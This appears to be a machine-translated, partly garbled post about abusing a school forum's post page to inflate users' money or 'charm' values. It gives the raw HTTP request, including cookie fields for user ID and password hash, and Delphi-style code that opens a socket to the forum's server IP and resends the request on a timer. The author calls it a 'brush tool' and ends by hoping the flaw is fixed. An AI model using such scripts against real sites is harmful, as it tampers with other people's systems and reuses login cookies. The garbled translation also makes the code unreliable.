Our school's student forum is used by the CPB Forum. Every time there is a situation, there is a charm, to change the money or charm of the posting person, watching it is interesting, after several posting, suddenly found post-post Page, by pressing F5, you can also change the amount of money or charm value by pressing the F5, so I understand how white little idiots will have so much money, but press F5 too slow, and of course it also writes a test program. In fact, it is very simple, it is a packet sent by the HTTP host through the socket.
Get /bbs/postfo.asp?t_id=3073&l_id=39&action=do http / 1.1accept: * / * referer: http://stu.sdai.edu.cn/bbs/postfo.asp?t_id=3073&l_id=39&action=doaccept -Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent: Mozilla / 4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: stu.sdai.edu.cnConnection: Keep-AliveCookie: XPlinklinkfylogin = CPB; XplinkLinkFeiyue = userid = xxx & password = xxxxxxxxxxxxxxxx & username = xxxxxxxx; aspsessionidqqqqlcy = hdimhdmikgelgohojlnpkl
Among them, by cookie to determine the sender's information userid as ID, password's MD5 16-bit encrypted MD5 16-bit encrypted, from the system's cookies folder, you can find the main code below due to our only packet without considering After the information, you can use a Timer control to specify intervals to send construct sending strings.
RL: = CHR (13) CHR (10); sendStr: = 'get /bbs/postfo.asp?t_id=3073&l_id=39&ction=do http / 1.1' rl 'accept: * / *' rl 'Referer: http://stu.sdai.edu.cn/bbs/postfo.Aasp?t_id=3073&l_id=39&action=do ' RL ' Accept-Language: ENCODING: GZIP, DEFLATE ' RL 'User-agent: mozilla / 4.0 (compatible; msie 6.0; Windows NT 5.0; .NET CLR 1.1.4322)' rl 'host: stu.sdai.edu.cn' rl 'connection: Keep-Alive' RL 'Cookie: XPlinklinkfylogin = cpb; XPlinklinkfeiyue = userid =' edit5.Text '& password =' edit2.Text '& username =' edit1.Text '; ASPSESSIONIDQGQQQLCY = HDIMHDCDMIKGELGOHOJLNPKL' rl rl rl; initialization tcpclient
TCPC1.Remotehost: = '202.194.85.2'; tcpc1.remoteport: = '80'; tcpc1.open; add code if tcpc1.connected by Tcpc1.connected by Tcpc1.connected; tcpc1.connect; tcpc1.sendln (SendStr); Set Timer's delay according to the network speed
Such a simple brush tool is done, huh, hoped that the forum corrected this vulnerability
